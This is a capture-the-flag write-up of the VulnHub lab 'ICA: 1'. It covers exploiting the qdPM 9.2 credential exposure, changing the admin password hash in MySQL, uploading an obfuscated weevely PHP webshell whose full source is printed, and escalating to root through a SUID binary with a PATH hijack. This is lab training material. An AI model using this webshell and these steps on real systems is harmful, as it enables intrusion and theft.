Vulnhub刷题记录(ICA: 1)

• Product Name:ICA: 1
• Chinese name: ICA: 1
• Published date: September 25, 2021
• Difficulty: Easy
• Description: Based on information from our intelligence network, the ICA is working on a secret project. We need to figure out what this project is. Once you have access information, please send it to us. We'll put a backdoor to access the system later. You just have to focus on what the project is. You may have to go through several layers of security. The IAEA is confident that you will succeed in this task. Good luck, agent!
• Download: https://www.vulnhub.com/entry/empire-breakout,751/

AILX10

Excellent answerer in cybersecurity

Master's in Cybersecurity

Go to consult

1. Deployment information (IP address: 192.168.199.168)

Boot

2. Port scanning, ports 22, 80, 3306 are opened, and there is also a salt of the database

Salt: O*IDsu\x1B	Zp4BOQ#,Uo,S           

Port scanning

3. View the homepage, which is a login page and requires an email address and password

🔥 Home page

4. Try to scan other directories of the website to get the installation directory of the website

The directory where the website is installed

5. Try to query the qdPM 9.2 system vulnerability

qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt           

We would like to mention the qdPM 9.2 vulnerability

6. Check the exploits

The password and connection string for the database are stored in a yml file. 
To access the yml file you can go to http://<website>/core/config/databases.yml file and download. 
  
数据库的密码和连接字符串存储在 yml 文件中。 要访问 yml 文件，
您可以访问 http://<website>/core/config/databases.yml 文件并下载。           

Exploit methods

7. Download the yaml file and mention the username and password

qdpmadmin
UcVQCMQk2STVeS6J           

Username and password

8. Log in to the MySQL database

mysql -h 192.168.199.168 -u qdpmadmin -p
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| qdpm               |
| staff              |
| sys                |
+--------------------+           

Enter the database

5. Go to the qdpm database and view the tables

MySQL [(none)]> use qdpm
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [qdpm]> show tables;
+----------------------+
| Tables_in_qdpm       |
+----------------------+
| attachments          |
| configuration        |
| departments          |
| discussions          |
| discussions_comments |
| discussions_reports  |
| discussions_status   |
| events               |
| extra_fields         |
| extra_fields_list    |
| phases               |
| phases_status        |
| projects             |
| projects_comments    |
| projects_phases      |
| projects_reports     |
| projects_status      |
| projects_types       |
| tasks                |
| tasks_comments       |
| tasks_groups         |
| tasks_labels         |
| tasks_priority       |
| tasks_status         |
| tasks_types          |
| tickets              |
| tickets_comments     |
| tickets_reports      |
| tickets_status       |
| tickets_types        |
| user_reports         |
| users                |
| users_groups         |
| versions             |
| versions_status      |
+----------------------+
35 rows in set (0.021 sec)           

6. Check the configuration table, and mention the username and password of the website, but you can't log in

|  1 | app_administrator_email              | [email protected]                                                                                                      |
|  2 | app_administrator_password           | $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0             

View the table contents

7. Since it is impossible to crack the administrator's password, the password can be changed

$P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 The length is 34 characters, which is not generated by a simple Hash, but crypt(3) Hash, which is a one-way hash function based on the improved DES algorithm, which is a crypt(3) Hash backup with the plaintext "ailx10", and updates the password

MySQL [qdpm]> update configuration set value="$1$m0IX0vwl$HR6rGO5FjvC39TsfOXWLK0" where id=2;
Query OK, 1 row affected (0.007 sec)
Rows matched: 1  Changed: 1  Warnings: 0           

Create a new password

8. Successfully log in to the administrator web page

用户名：[email protected]
密码：ailx10           

Log in to the administrator console successfully

9. Try file upload, new users can upload avatars

Add a new user

But only pictures can be seen

Uploaded images

10. Switch to ailx10, a new user, and find that you can upload attachments, make webshell files and upload them

┌──(ailx10㉿kali)-[~]
└─$ weevely generate ailx10 ./ailx10.php            
Generated './ailx10.php' with password 'ailx10' of 771 byte size.
                                                                                                                                       
┌──(ailx10㉿kali)-[~]
└─$ cat ailx10.php 
<?php
$k='$k="83b70Yz5Yz04";$kYzh="e0d874Yz2ddYz5Yzb6";$kf="Yz6e6962eb8aYz35";$p=Yz"VkTYzVUW2Z';
$I='Yz(@baYzse64_decoYzde($mYz[1]),$k))Yz);$Yzo=@oYzb_get_Yzcontents()Yz;@ob_endYz_cleaYzn';
$G='zYzntYzents("php:Yz//input"),$Yzm)==1) {@obYz_Yzstart();@eYzval(@YzgzuncoYzmpress(@x';
$O='z"Yz;Yzfor(Yz$i=0;$i<$l;){for($j=0;($j<Yz$c&&Yz$i<$l);$jYz++,$i+Yz+Yz){$o.=$t{$i}Yz^$k{';
$s=str_replace('ij','','cijreatije_ijfuijncijijtion');
$P='$j}Yz;}}rYzeYzturn $o;Yz}if Yz(@prYzeg_matcYzh("Yz/$kh(.+)$YzkYzf/"Yz,@file_get_coY';
$i='MYzT1JVyFr";fYzuYzYznction x($t,$k)Yz{$c=sYztYzrlen($k);$l=sYztrlYzen($t);Yz$o="YzY';
$N='();$Yzr=@base6Yz4_eYzncodYze(@x(Yz@gzcoYzmpress($o),$YzkYz));print("$pYz$kh$rYz$kf");}';
$J=str_replace('Yz','',$k.$i.$O.$P.$G.$I.$N);
$m=$s('',$J);$m();
?>           

Upload attachments

11. Successfully obtain webshell

weevely http://192.168.199.168/uploads/attachments/575837-ailx10.php ailx10           

Get a webshell

12. Look for suspicious files and find /opt/get_access

find / -perm -u=s 2>&1 | grep -v "Permission denied"           

Look for suspicious files

13. The file was analyzed, and it was found that cat /root/system.info was executed

www-data@debian:/home $ ls -hl /opt/get_access
-rwsr-xr-x 1 root root 17K Sep 25  2021 /opt/get_access
www-data@debian:/home $ /opt/get_access

  ############################
  ########     ICA     #######
  ### ACCESS TO THE SYSTEM ###
  ############################

  Server Information:
   - Firewall:	AIwall v9.5.2
   - OS:	Debian 11 "bullseye"
   - Network:	Local Secure Network 2 (LSN2) v 2.4.1

All services are disabled. Accessing to the system is allowed only within working hours.
www-data@debian:/home $ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3#34;
GCC: (Debian 10.2.1-6) 10.2.1 20210110           

14. Try to set the environment variable, but find that this shell does not have this ability

更新cat 命令为shell

echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat           

Try setting environment variables

15. The webshell ability is very weak, so replace it with a rebound shell and successfully set the environment variables

┌──(root㉿kali)-[/home/ailx10]
└─# find / -name "php-reverse-shell.php" 2>/dev/null                   
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php           

Bounce the shell and set the environment variables

16. Successfully advanced to root permission

Get root access

17. Find 2 flags, one for ordinary users and one for privileged users

2 flags

At this point, the experiment is complete~